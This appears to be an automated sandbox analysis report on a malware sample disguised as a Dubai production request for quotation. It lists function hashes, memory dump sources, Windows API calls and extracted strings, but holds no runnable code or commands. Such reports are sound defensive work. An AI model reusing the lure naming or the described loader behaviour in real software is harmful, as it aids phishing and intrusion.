Opcode ID: c62549bf1135663c066d59d6c872c90f88eee0e1745a7df1ce74be221d52454b
Instruction ID: 07edbe8e9c07d9709d7c80e968028395b9ff0f11c8f8d0346f5c9314bfd274db
Opcode Fuzzy Hash: c62549bf1135663c066d59d6c872c90f88eee0e1745a7df1ce74be221d52454b
Instruction Fuzzy Hash: 9521F275604340EFDB14DF54D9C0B16BB65EB84318F20C569E84E4B286C33AD846CA62

Function 00C0D005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.108765187630.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0d000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d7279ddc551e250806e2dc8b05bea1a3c8ccdc6d63ed7e62e1b7c052c4135f2
Instruction ID: 3e6e04460aae46eccdcd84af413af4e5d7526be1358c56113e5452e1ec2a9e28
Opcode Fuzzy Hash: 9d7279ddc551e250806e2dc8b05bea1a3c8ccdc6d63ed7e62e1b7c052c4135f2
Instruction Fuzzy Hash: 02218E755093C08FCB02CF24D990715BF71EB46318F28C5EAD8498F6A7C33A980ACB62

Function 00BFD1F7 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.108765122481.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bfd000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb57a928172e6a32799255795d9889f9a8f30b8ef93ece1e942708ab82c5129e
Instruction ID: 95eadea5eec4871b650c46d2e24d7edfcda4366b249313ffe6f40d6d2ba946ff
Opcode Fuzzy Hash: eb57a928172e6a32799255795d9889f9a8f30b8ef93ece1e942708ab82c5129e
Instruction Fuzzy Hash: BE21B176504284DFDB06CF50D9C4B66BFB2FB84314F24C6A9DD080B656C33AD86ACBA1

Function 00C0D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.108765187630.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0d000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09e40937a328b0c0af1e264ae8c80ed13ba05ba0d680d0485db096c60295ddd8
Instruction ID: e247dd69dc97c61329493198280fea2ac2cfbe3c2f87d26539a741077784010d
Opcode Fuzzy Hash: 09e40937a328b0c0af1e264ae8c80ed13ba05ba0d680d0485db096c60295ddd8
Instruction Fuzzy Hash: 4911DD75904280DFCB01CF54C5C0B15FBB1FB84314F24C6AED84A4B696C33AD95ACB61

Non-executed Functions

Function 068DADA0 Relevance: 4.3, Strings: 3, Instructions: 527COMMON

Download Yara Rule

Strings

:, xrefs: 068DAFF8
p"r, xrefs: 068DB1F3
~, xrefs: 068DAFAD

Memory Dump Source

Source File: 00000000.00000002.108770947837.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_68d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: :$p"r$~
API String ID: 0-36627797
Opcode ID: 79e4d8d8dd74010742690fc858600d96760e910e6a005192a8f879023924c109
Instruction ID: 7f3de1a9f99d9dd7ddd486a918029d548ec57829f4cb84ee4b9cdc72737b3dd4
Opcode Fuzzy Hash: 79e4d8d8dd74010742690fc858600d96760e910e6a005192a8f879023924c109
Instruction Fuzzy Hash: 4E32D175A00218DFDB59CF98C980E9CBBB2FF49304F1580E9E609AB265CB31AD91DF50

Function 06D33D88 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.108771586925.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d30000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 162f0e5b575b2ae8567eb3deccc2e74e7fe4a3ff78501bb638a0b8369f6ad76f
Instruction ID: d2b1a9173d57751c39ebf404d0b765e038a86240a63fb0a3b786e0b5ea7bd55a
Opcode Fuzzy Hash: 162f0e5b575b2ae8567eb3deccc2e74e7fe4a3ff78501bb638a0b8369f6ad76f
Instruction Fuzzy Hash: 98E12C74E002598FDB54DFA9C680AAEFBF2FF89304F248169D415AB359C734A941CFA0

Function 06D35FA0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.108771586925.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d30000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1765e8f27c2820d295ed18de46e2f10daf932055ba56c1f96f9125945b6eeece
Instruction ID: 1eec86b844c568f3876f6094126289867480c89c333e6aaf88a8a5ddbf861ed4
Opcode Fuzzy Hash: 1765e8f27c2820d295ed18de46e2f10daf932055ba56c1f96f9125945b6eeece
Instruction Fuzzy Hash: D5E12B74E002599FDB54DFA9C581AAEFBF2FF89304F248169D415AB35AC730A941CFA0

Function 06D355F0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.108771586925.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d30000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51bbf7d94721e7fe79ee344a76319b610b50f765437a708a3c1471ee8f776eb5
Instruction ID: 1819b4776e1073a624653166d92b67f17a20c69dcf702f6a31df1212ab4ffd58
Opcode Fuzzy Hash: 51bbf7d94721e7fe79ee344a76319b610b50f765437a708a3c1471ee8f776eb5
Instruction Fuzzy Hash: D3E119B4E102198FDB54DFA8D580AAEFBF2FF89304F248169D415AB359D730A941CFA0

Function 06D33960 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.108771586925.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d30000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fc2dcd76c143268d8cd4d77dbeed0a50f7c35dcc1ce06f5c1172f441ddc8df3
Instruction ID: dc236231fb8cfc60eb862ecc0f914ff7171ddb0d80a7cf7fcc42422fec545724
Opcode Fuzzy Hash: 9fc2dcd76c143268d8cd4d77dbeed0a50f7c35dcc1ce06f5c1172f441ddc8df3
Instruction Fuzzy Hash: FDE12D74E002698FDB54DFA8C6819AEFBF2FF89304F248169D455AB359C730A941CFA0

Function 06D35F90 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.108771586925.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d30000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec3f4f56b2eb7c7333073800882833815ea5b2af2aa19dfd59119e5ea1d80012
Instruction ID: ad5c96b8f67894b9377cb72ee489dda9337066777df7ad4d991dc8320887153f
Opcode Fuzzy Hash: ec3f4f56b2eb7c7333073800882833815ea5b2af2aa19dfd59119e5ea1d80012
Instruction Fuzzy Hash: EA513F74E002599FDB54DFA9C9815AEFBF2FF89300F24816AD418AB356D7309941CFA1

Function 068DAD90 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.108770947837.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_68d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 885473ffc0d01ab6f28318c18623e443fd6c5179e3b2334c60735e6f56495049
Instruction ID: 213e031dc9ac910be33e0ecb963dd54c25bc5dfc5b6ee2b9eb8d12ca213bc1be
Opcode Fuzzy Hash: 885473ffc0d01ab6f28318c18623e443fd6c5179e3b2334c60735e6f56495049
Instruction Fuzzy Hash: CE51A4B5E016188FEB58CFAAC840BDDBBF2BF89300F14C5A6D909AB214D7705985CF61

Analysis Process: AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exePID: 8952, Parent PID: 8576COMMON

Execution Graph

Execution Coverage:	1.4%
Dynamic/Decrypted Code Coverage:	5.2%
Signature Coverage:	8.1%
Total number of Nodes:	135
Total number of Limit Nodes:	11

Executed Functions

Function 00417703 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417775

Memory Dump Source

Source File: 00000002.00000002.109068418173.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: a2371e0f69735f1bb3e64c9d73864bdab28b23b965b0716223c90cf73c0f6738
Instruction ID: 8811e3f495683607bd3aa35ec182e619f439c84cc338cc849a8f9cbf6ffa511e
Opcode Fuzzy Hash: a2371e0f69735f1bb3e64c9d73864bdab28b23b965b0716223c90cf73c0f6738
Instruction Fuzzy Hash: 52015EB5E4020DABDB10EBE5DC42FDEB7789B54308F4041BAE91897280F635EB48CB95

Function 0042C503 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C534

Memory Dump Source

Source File: 00000002.00000002.109068418173.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: baff932895ef524f9b8537ce661c467f337dfa349f09b638fbb3483684aaee24
Instruction ID: 3ebafd52e02b158bd92cc752df2fb23be98611f796f4d2ab3cd56cc18ca033c2
Opcode Fuzzy Hash: baff932895ef524f9b8537ce661c467f337dfa349f09b638fbb3483684aaee24
Instruction Fuzzy Hash: 3DE08C7A6002147BC620FA6AEC41F9B77ACDFC5718F04442AFA08A7241CBB9B90187F4

Function 016434E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 016434EA

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b9a16283769b4bea894c97074cc8efe8aecca96cda0c0eb054a594cd7380fe73
Instruction ID: 1fadbcdbed767a5a3faf29e8f974ea9e74b7f8a57a11bc83f4ccec1671b42fc4
Opcode Fuzzy Hash: b9a16283769b4bea894c97074cc8efe8aecca96cda0c0eb054a594cd7380fe73
Instruction Fuzzy Hash: 3190023160520412D64065595A147071009D7D0201F62C815A44246A8DC7A5895175A2

Function 01642B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01642B9A

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bbe4922fcd282b849ab6b5def234d5dd1461e70ff5089cd2df5ec7d0c77d52c6
Instruction ID: 355cbfc5784323aa34dea65d2ff41e3d74076f359b23b4a6186f76527d457b6e
Opcode Fuzzy Hash: bbe4922fcd282b849ab6b5def234d5dd1461e70ff5089cd2df5ec7d0c77d52c6
Instruction Fuzzy Hash: E490023120118812D6506559990474B0009D7D0301F56C815A8424798DC6A588917121

Function 01642A80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01642A8A

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 19c26cfa242085a4537bc08d9afba5150e22a1382442d3508abe7393a003489c
Instruction ID: ea37f1507df3cba296a81615b92b81ceefe4bb7761404f1ae9e559a4dda28dd9
Opcode Fuzzy Hash: 19c26cfa242085a4537bc08d9afba5150e22a1382442d3508abe7393a003489c
Instruction Fuzzy Hash: 3490026120210013464575595914617400ED7E0201F52C425E50146D0DC53588917125

Function 01642D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01642D1A

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b189574171f1cc42c787412b864d81c6802bd1246820dc2b863dd521744b5610
Instruction ID: 25a4a76bac84631a2fdfb8108f83367eae3d5106c13cba7d634fe469baab61d2
Opcode Fuzzy Hash: b189574171f1cc42c787412b864d81c6802bd1246820dc2b863dd521744b5610
Instruction Fuzzy Hash: A290023120110423D65165595A04707000DD7D0241F92C816A4424698DD6668952B121

Function 00413F3B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(Um65m294,00000111,00000000,00000000), ref: 00413FBA

Strings

Um65m294, xrefs: 00413FC1, 00413FC4
Um65m294, xrefs: 00413FAF, 00413FB9, 00413FCA

Memory Dump Source

Source File: 00000002.00000002.109068418173.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: Um65m294$Um65m294
API String ID: 1836367815-1464632253
Opcode ID: 1c06cb9f5b3e219135e228c7bb5f0cbcf136072d43096a5a58ef83c164460625
Instruction ID: cbd587a8dfbd562b0627201dc3b0d7f8d667904b1f5ef9c1909e0421a54a32da
Opcode Fuzzy Hash: 1c06cb9f5b3e219135e228c7bb5f0cbcf136072d43096a5a58ef83c164460625
Instruction Fuzzy Hash: A311E7B1D4115CBADB01AAE19C81DEF7F7CDF45798F05806EFA1467242D2788F0687A1

Function 00413F1B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(Um65m294,00000111,00000000,00000000), ref: 00413FBA

Strings

Um65m294, xrefs: 00413FC1, 00413FC4
Um65m294, xrefs: 00413FAF, 00413FB9, 00413FCA

Memory Dump Source

Source File: 00000002.00000002.109068418173.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: Um65m294$Um65m294
API String ID: 1836367815-1464632253
Opcode ID: a321342b988e9691f279cfaab81fed1fa6f448f9c5ebd68e6e8b52d8e47ad718
Instruction ID: db347fa541f080bf487053aa23b3605e5a7c982556fdaad6221f5deb0b79ad2c
Opcode Fuzzy Hash: a321342b988e9691f279cfaab81fed1fa6f448f9c5ebd68e6e8b52d8e47ad718
Instruction Fuzzy Hash: 791125B2D441587ADB01AED19C82CEE7B7CDF81668F04806AF914AB242C17C8F0B4BA1

Function 00413F43 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(Um65m294,00000111,00000000,00000000), ref: 00413FBA

Strings

Um65m294, xrefs: 00413FC1, 00413FC4
Um65m294, xrefs: 00413FAF, 00413FB9, 00413FCA

Memory Dump Source

Source File: 00000002.00000002.109068418173.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: Um65m294$Um65m294
API String ID: 1836367815-1464632253
Opcode ID: ddf6f63d3fdfcd9f115e3a53cca71751da9a55a1cf53efdcc9878579d706cded
Instruction ID: c716e00ea6789a89665cfe6b10199f950aa57300d949c538a8e6d24bdb59d58c
Opcode Fuzzy Hash: ddf6f63d3fdfcd9f115e3a53cca71751da9a55a1cf53efdcc9878579d706cded
Instruction Fuzzy Hash: 7501C4B2D4021C7ADB01AAE59C81DEF7B7CDF41698F04806AFA1467141D5784F068BA1

Function 00413EE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(Um65m294,00000111,00000000,00000000), ref: 00413FBA

Strings

Um65m294, xrefs: 00413FC1, 00413FC4
Um65m294, xrefs: 00413FAF, 00413FB9, 00413FCA

Memory Dump Source

Source File: 00000002.00000002.109068418173.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: Um65m294$Um65m294
API String ID: 1836367815-1464632253
Opcode ID: f44fe9c20b2e950a574838e9a865a7ec7f8f636cc21c7d4cf1ba9fa7ef83178f
Instruction ID: 162a6e98c6ea17a0957ab6f1fbfed3524d30f9d6addcd53659571b943a5925c8
Opcode Fuzzy Hash: f44fe9c20b2e950a574838e9a865a7ec7f8f636cc21c7d4cf1ba9fa7ef83178f
Instruction Fuzzy Hash: D701F1B2D4021CBBDB016AE0DC81CEEB77CEF41754F01816AFA14AB141D6384F068BA5

Function 0042C863 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,FFFFFFFF,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042C89C

Strings

TdA, xrefs: 0042C866

Memory Dump Source

Source File: 00000002.00000002.109068418173.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: TdA
API String ID: 3298025750-2495512795
Opcode ID: 43cd4e1841366eb8dd9f85b2832fef85b9e29d213aa65e85501d174e6df69b4b
Instruction ID: eebabd3e2fe7716c271f0cb75ac642f9a3195348c591bd27a66e86371b86416e
Opcode Fuzzy Hash: 43cd4e1841366eb8dd9f85b2832fef85b9e29d213aa65e85501d174e6df69b4b
Instruction Fuzzy Hash: 09E092B52042047BD624EE59DC45FAB37ACEFC8714F004419FE18A7281C770BD108BB8

Function 004176F6 Relevance: 1.6, APIs: 1, Instructions: 109
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417775

Memory Dump Source

Source File: 00000002.00000002.109068418173.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 92788532b1449eb3d3a79c02e31f40bba04461b8714ea3a7c4a5156b2ac21ff2
Instruction ID: 689e64bc530f07a4520bfde8618bfc05d82bb4c8e4a92253c7d7224c182cec2e
Opcode Fuzzy Hash: 92788532b1449eb3d3a79c02e31f40bba04461b8714ea3a7c4a5156b2ac21ff2
Instruction Fuzzy Hash: 67312D71D0C1465FDB10DF58DC95AFEBB749F11318F0440ABE85487242F676AA88CB65

Function 004177AC Relevance: 1.5, APIs: 1, Instructions: 45
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417775

Memory Dump Source

Source File: 00000002.00000002.109068418173.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 3adbbe26b99311cd87ff34bd4b18c9579a6c8b21d98da8ab9d1e573b00d4b7cf
Instruction ID: ce25d14661820b9627c9b97a9444bc2e549720640ce339fc44f8c2fa348cc467
Opcode Fuzzy Hash: 3adbbe26b99311cd87ff34bd4b18c9579a6c8b21d98da8ab9d1e573b00d4b7cf
Instruction Fuzzy Hash: 67F0563650420AEEFB00DBE4DD95FD9FBA4DB41354F148246F468CA1D1D334A6478BC0

Function 0042C813 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,0041E4FB,?,?,00000000,?,0041E4FB,?,?,?), ref: 0042C84F

Memory Dump Source

Source File: 00000002.00000002.109068418173.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 2c7a0dcd4557c6a70790a87367f7d26f466e41790c9ae8fb8b689b1ea29fd940
Instruction ID: 6247db4ad1f5429e3d84521cca5b598727755b202f7d9da2c00aebb836c4a43e
Opcode Fuzzy Hash: 2c7a0dcd4557c6a70790a87367f7d26f466e41790c9ae8fb8b689b1ea29fd940
Instruction Fuzzy Hash: 2FE06DB56002047BC620EE59DC41E9B37ACEFC9714F004419FA08A7241C770B91087B4

Function 0042C8A3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,00000000,00000000,?,75EB6A0C,?,?,75EB6A0C), ref: 0042C8DA

Memory Dump Source

Source File: 00000002.00000002.109068418173.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 4b4b40f828afa73cfd8c3fdb2858cedb2c936d7545360d064ef6b2a705b2ae06
Instruction ID: 275e752d9313dce647ac2766a03d1bad5f877c2da86c0069f42e2579b41fbfc4
Opcode Fuzzy Hash: 4b4b40f828afa73cfd8c3fdb2858cedb2c936d7545360d064ef6b2a705b2ae06
Instruction Fuzzy Hash: 41E04F752006147BC520AB5ADC01F9B775CDBC5714F50801AFA0867242C7B4B91087F4

Function 01642B2A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01642B44

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7cdd8f08b2513cea5a100e6f5d196ab62ab7837bbe5617f7ade9c5228f96c67e
Instruction ID: a4f72a687ba8a91fc3bfd7368dd7f8db924c3bf399536e8990bcd67479798d51
Opcode Fuzzy Hash: 7cdd8f08b2513cea5a100e6f5d196ab62ab7837bbe5617f7ade9c5228f96c67e
Instruction Fuzzy Hash: 8DB092729025C5DBEB52EB646F08B1B7A04BBD0705F26C46AE24707D1F8778C091F276

Non-executed Functions

Function 01638540 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

corrupted critical section, xrefs: 016752CD
undeleted critical section in freed memory, xrefs: 01675236
Invalid debug info address of this critical section, xrefs: 016752C1
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016752D9
Critical section address., xrefs: 0167530D
8, xrefs: 016750EE
Critical section debug info address, xrefs: 0167522A, 01675339
double initialized or corrupted critical section, xrefs: 01675313
Thread is in a state in which it cannot own a critical section, xrefs: 0167534E
Thread identifier, xrefs: 01675345
Address of the debug info found in the active list., xrefs: 016752B9, 01675305
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01675215, 016752A1, 01675324
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016752ED
Critical section address, xrefs: 01675230, 016752C7, 0167533F

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: ad75f1d5571cabcccd63b4e4aa026fd27ffc7889bf29fb4209d8acb02a2bc870
Instruction ID: 1e37fd784ff4134b1ac81740e8cc8308df338d18576e38b1a7bda42d5a571287
Opcode Fuzzy Hash: ad75f1d5571cabcccd63b4e4aa026fd27ffc7889bf29fb4209d8acb02a2bc870
Instruction Fuzzy Hash: 8C818971E40358ABDB24CF99CD45BAEBBF9FB48B14F20415DF905AB280D3B4A941CB60

Function 015FD2EC Relevance: 11.6, Strings: 9, Instructions: 312COMMON

Download Yara Rule

Strings

PreferredUILanguages, xrefs: 015FD458, 015FD465
MachinePreferredUILanguages, xrefs: 015FD625
Control Panel\Desktop, xrefs: 015FD3FD
@, xrefs: 015FD603
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 015FD356
Control Panel\Desktop\MuiCached, xrefs: 015FD5CB
PreferredUILanguagesPending, xrefs: 0165A66D
@, xrefs: 015FD389
@, xrefs: 015FD43D

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
API String ID: 0-3532704233
Opcode ID: e21cb5efda4e1d5ef95cfae69e0c5238757912c6f87b4eb342c6df359ac427a6
Instruction ID: 66ee3b70929d37b930a2039ebf8b10f73b5cf45bac1f6d6b34998febf563c5ae
Opcode Fuzzy Hash: e21cb5efda4e1d5ef95cfae69e0c5238757912c6f87b4eb342c6df359ac427a6
